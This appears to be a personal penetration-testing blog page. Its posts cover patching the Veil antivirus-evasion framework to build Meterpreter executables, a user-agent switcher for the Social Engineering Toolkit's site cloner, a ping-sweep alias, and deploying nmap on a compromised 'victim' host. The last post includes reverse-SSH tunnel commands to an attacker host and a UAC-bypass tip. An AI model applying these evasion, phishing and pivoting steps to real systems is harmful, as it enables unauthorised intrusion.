Code

Sewing Patches in the Veil AV Evasion Framework

by on Aug.24, 2013, under Code, Posts

I have to admit that I am a little bit weary about the gaining popularity of Veil. AV evasion is really a game of cat and mouse, between the anti-virus companies and the individuals who are trying to evade detection. In this article we will be taking the role of the ‘mouse’ per se by working with this framework. We will first fix a bug in the framework and I will also show you how to use this framework in an ARM Kali chroot environment where wine is not readily available.

First, let us fix Veil because without this fix, Veil’s use under a Linux environment is diminished greatly. To get the Veil framework, you can either do:

git clone https://github.com/ChrisTruncer/Veil veil

Or

sudo apt-get install veil #If you have the right repositories or are using Kali Linux


To get the newest bleeding edge version, you’ll want to use the git method. However, if you use this method you will need to run the setup.sh script under the setup directory. This will handle the installing of the necessary dependencies. If you’re running an ARM Kali chroot environment on an Android based device, you will want to use ‘git’ because if you attempt to use apt-get to install veil, it will bomb out and give you an error message that wine is unavailable.

Upon my first use of Veil, I followed this post from the SANS Penetration Testing website closely. One issue I ran into was in the ‘How would you like to create your payload executable?‘ stage. The default method ‘Pyinstaller’ method did not seem to be creating an executable  in the veil/output/compiled/ directory, but it would create a source file in the source directory (which is still useful, more on this later).

I knew the framework relied on wine and a wine installed version of python to generate payloads under a Linux environment but wasn’t sure where to look for where this took place in Veil’s code. I started greping for wine in the Veil python modules and soon discovered this interesting piece of code that appeared to be the source of the problem.

Line 84 of the supportfiles.py file which is in the veil/modules/common/ directory contains this line of code:

os.system(‘wine ‘ + os.path.expanduser(‘~/.wine/drive_c/Python27/python.exe’) + ‘ ‘ + os.path.expanduser(‘~/pyinstaller-2.0/pyinstaller.py’) + ‘ –noconsole –onefile ‘ + payloadFile )

Due to the fixed path of ‘~/pyinstaller-2.0/pyinstaller.py’ for Veil to work with this current code, one must have this directory structure and files in their home directory. If you’re using Kali Linux, change this piece of code to ‘/usr/share/pyinstaller/pyinstaller.py’ and Veil will now create portable windows executables.

Before I discovered the source of this bug and simple fix for it, I took the harder route and attempted to create the portable executables under wine following these requirements (from https://github.com/ChrisTruncer/Veil/blob/master/README.md ) :

Windows

  1. Python (tested with x86 – http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  3. PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)

I soon learned there were issues with py2exe working under wine. py2exe under wine creates invalid windows portable executables. (http://stackoverflow.com/questions/12170373/python-to-windows-executable-under-wine). I was then stuck with the Py2Exe method that relies on having a Windows machine readily available.

Veil Mobile Scenario

This then brings me back to the mobile scenario. To the best of my knowledge at the moment (and correct me if I’m wrong) you can’t install wine under an ARM Kali Linux chroot environment. So if you want to create payloads using Veil on your Android device, you will have to first obtain Veil via git. Secondly, there is no need to fix the code like I posted. You can leave the code as is.

You can now create python source files using either pyinstaller or py2exe under Veil. If you use the pyinstaller method, you will have to copy the files to a Linux machine that has necessarily dependencies for Veil and you can simply create an executable doing something like this:

wine ~/.wine/drive_c/Python27/python.exe /usr/share/pyinstaller/pyinstaller.py meterpreterpayload.py

Or you can use the py2exe method and copy the files to a Windows machine and compile your executable that way.

Other issues with Veil

One minor annoyance with Veil, is that I’ve noticed the portable executables are kind of hefty in size. If you create a payload using the pyinstaller method, the executable is about 2.4 megs and if you create one using the py2exe method under windows, the executable is over  5 megs. This is quite large in comparison to using msfpayload/msfencode or msfvenom, which creates payloads that are typically less than 100 kilobytes.

I would also like to see Veil being able to bind the obfuscated payload to non malicious executable like putty, however all in all I’m very impressed with this framework and hope the developers like Chris Truncer keep up the good work.

Leave a Comment :, , , , , , , , , more...

Social Engineering Toolkit – User Agent Switcher – setuas.sh

by on Jan.20, 2012, under Code, Posts

Imprimis, if you are not familiar with the concept of social engineering, take a look at:

https://en.wikipedia.org/wiki/Social_engineering_(security)

If you are looking for a good book on this topic, then I would highly suggest buying a copy of:

http://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539/ref=sr_1_1?ie=UTF8&qid=1327118815&sr=8-1

As for software implementations that you can use to leverage social engineering attacks on targets, David Kennedy‘s Social Engineering Toolkit (SET) is probably one of the best, if not only social engineering frameworks that I know of. SET does not really rely on vulnerable services which I believe is one of the most useful aspects of this toolkit. What you do have to rely on is social engineering. Services and software will be patched while humans will most likely always be vulnerable to social engineering attacks due to misplaced trust.

Despite the fact that this framework is practically the only of its kind, it does have some limitations in certain realms, namely the web site cloning feature. The issue I have ran into with SET is due to the user agent string not being easily switchable. To switch the user agent string for SET, you must manually edit the cloner.py (which is located in/src/webattack/web_clone/ directory) .

The default user agent of SET is:

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

This means that when the Social Engineering toolkit makes a request on a website and clones it, the response of the web service is based on this user agent string.

What if I want to clone a website that is the mobile version? What if I want to clone a website that checks to see if end users are Microsoft Windows users? This is where the Social Engineering Toolkit User Agent Switcher(setuas.sh) is applicable. This is a very simple Bash shell program that edits the user agent string in the cloner.py module of SET to whatever you like. Simply execute this:

./setuas.sh /pentest/exploits/set/src/webattack/web_clone/cloner.py

You will then be prompted to enter in a user agent string which for instance could be:

Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9

For the moment this is just a quick hack to address the issue. I believe that the SET team should add an option in the config file (/set/config/set_config) for end users to adjust accordingly.

setuas.sh is located here:

http://zitstif.no-ip.org/set/setuas.sh

If you want to just see the plain text version of this file, it is located at:

http://zitstif.no-ip.org/set/setuas.txt

Leave a Comment :, , , , , , , , , , , , , , , , , more...

Kolmogorov Complexity, Natural Language Programming and the Bash shell

by on Jan.14, 2012, under Code, Posts

The following post superficially applies the concepts of Kolmogorov complexity of an object and natural language programming using the bash shell. Part of the inspiration for this post came from this video: http://www.youtube.com/watch?v=KyB13PD-UME

In this post we will be treating strings as objects in a similar sense of Kolmogorov complexity. Then we will apply an alias name or function name to the object which then the alias/function name can be perceived as a natural language sentence.

Take the following object:

sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’)

To individuals who are not familiar with the bash shell or bash shell programming, this object does not make a whole lot of sense. What does it do? What does it mean? Why is this one-liner algorithm useful to some individuals?

For those of who you aren’t sure, this one-liner algorithm is used for ping sweeping your local subnet based upon the gateway’s IP address. So if your gateway is 192.168.1.1 then when the bash shell expands and processes the sub-shell variable $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’‘), it would result with 192.168.1.1-254. Lastly, the string would result with sudo nmap -sP -n -T4 192.168.1.1-254.

To take the time to type out this 196 character object each time you connect to a network that you’re exploring, would be extremely tedious and time consuming. Ergo to save an individual some time and keystrokes, this is where we will apply the ‘alias’ function that is built into the bash shell:

alias PingSweepLocalSubnet=”sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’)”

Here the 20 character alias PingSweepLocalSubnet saves the end user 176 characters to type and makes more sense depending on if the user is familiar with networking terminologies. Granted this may not be, “the shortest description of this object” and the proper simplifying algorithm according to Kolmogorov complexity method, but this is where the idea of natural language programming is applied. With this object, if we use the Kolmogorov complexity concept, is nearly incompressible. I wanted this alias to be time saving and to be almost a form of natural language programming.

We must also remember that we do not necessarily need to use the ‘alias’ function from the bash shell. We can also achieve the same result by using ‘function’ from bash shell:

function PingSweepLocalSubnet()
{
sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’
);
}

In turn end users may want to use function assignments rather than aliases. Aliases are limited and are simply string substitutions. For further reading on using aliases or functions take a look at: http://linuxgazette.net/issue53/eyler.html Whether or not the end user decides to use ‘alias’ or ‘function’ is subjective to the user.

Leave a Comment :, , , , , , , , , , , , , , , , , , , , , , more...

A Note on Updating Weaponized Nokia N900s

by on Dec.17, 2011, under Code, Posts

I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s.

If you regularly update your Nokia N900 by doing (as root):

apt-get update && apt-get upgrade -y

I have ran into some issues with some of the newer packages.

Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable.

Running this:
nmap -sS -P0 -vv www.google.com -p 80

Yields:
Starting Nmap 5.59BETA1 (http://nmap.org) at 2011-12-17 21:14 EST
Warning Hostname www.google.com resolves to 6 IPs. Using 74.125.45.147
route_dst_netlink: can’t find interface “wlan0”

Secondly, subversion (svn) gets completely broken due to a library compatibility issue:

svn -h
Segmentation fault

There has been discussion on this: http://talk.maemo.org/showthread.php?p=970467

Having svn broken really stinks, because then I am not able to update Metasploit. Who in the hell wants to run an outdated version of Metasploit? (I imagine there are some people..)

To work around this for the time being I have crafted the following shell script:

#!/bin/bash

if [ ${#} -lt 1 ]
 then
   echo "Usage:	"
   echo "./update.sh normal #This just does a normal update";
   echo "./update.sh modded #This will do a normal update and then downgrade libaprutil1, libapr1 and nmap so that they work";
   exit 1;
fi

if echo ${1} | egrep "normal"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   exit 0;
elif echo ${1} | egrep "modded"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   apt-get install nmap=5.50-2 libaprutil1=1.3.9-2 libapr1=1.4.2-1 --force-yes -y;
   apt-get clean && apt-get autoclean;
   exit 0;
else
   echo "I don't know what you are trying to do.." #Thanks Arc
   exit 2;
fi

http://zitstif.no-ip.org/update.txt
SHA1 (update.txt) = d83306d18a146a54a38ea236e3a236b4955bb81b

For the time being if you’re in a similar case like me, you’ll have to use this shell script (wget http://zitstif.no-ip.org/update.sh &&  chmod +x update.sh && ./update.sh modded).

15 Comments :, , , , , , , , , , , , , , more...

Meterpreter script – deploy_nmap.rb

by on Aug.08, 2011, under Code, Meterpreter Scripts, Posts

Using a ‘trusted’ host that you have compromised as leverage during a pentest, is nearly always advantageous. I personally believe that the steps of pentesting change in a sense, once you have a session on a computer in an internal network from an external computer.

I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what a better way to give the ‘man on the inside’ some ‘eyes’ by deploying and using nmap!

One means of using nmap through the compromised host includes:

1.) Deploying an openssh server on the victim machine

2.) Setting up an account

3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com

4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222

5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.

Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use but let me be quite frank, it doesn’t compare to what is known as the ‘king of all port scanners’ nmap. (No offense Metasploit crew.)

This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine. (i.e. nmap –script=smb-check-vulns).

The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.

NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap.  Luckily there is a module with the Metasploit framework that will help you (post/windows/escalate/bypassuac).

http://zitstif.no-ip.org/meterpreter/deploy_nmap.txt

Leave a Comment :, , , , , , , , , , , , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!